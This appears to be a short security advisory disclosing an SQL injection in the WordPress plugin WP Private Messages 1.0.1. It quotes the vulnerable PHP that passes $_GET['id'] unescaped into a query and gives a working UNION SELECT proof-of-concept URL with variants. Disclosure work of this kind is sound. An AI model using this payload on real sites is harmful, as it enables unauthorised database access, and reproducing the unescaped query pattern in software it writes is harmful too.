WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection

Homepage:

https://wordpress.org/plugins/wp-private-messages/

Description:

Type user access: registered user.

$_GET[‘id’] is not escaped. Url is accessible for every registered user.

File / Code:

Path: /wp-content/plugin/wp-private-messages/wpu_private_messages.php

Line: 218

global $current_user, $wpulang;

$id = $_GET["id"];
$user = $_GET["name"];

...

$bf = "<tr><td class=\"left\">"; $mid = ": </td><td>"; $af = "</td></tr>";

$pm = $wpdb->get_row("SELECT * FROM $wpdb->prefix".private_messages." WHERE id = $id", ARRAY_A);

echo "<table id=\"readpm\">";

Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 -Using :

http://target/wp-admin/users.php?page=wp-private-messages%2Fwpu_private_messages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wp_terms+WHERE++term_id%3D1&r=recieved

Obs: Use id number of your user in third column after word select. For example:

UNION+SELECT+1,2,1,name,slug…

UNION+SELECT+1,2,2,name,slug…

…UNION+SELECT+1,2,3,name,slug…

…UNION+SELECT+1,2,4,name,slug…

…UNION+SELECT+1,2,5,name,slug…

2 – Result:

 

Timeline:

  • 12/12/2016 – Discovered
  • 13/12/2016 – Vendor not finded

Leave a reply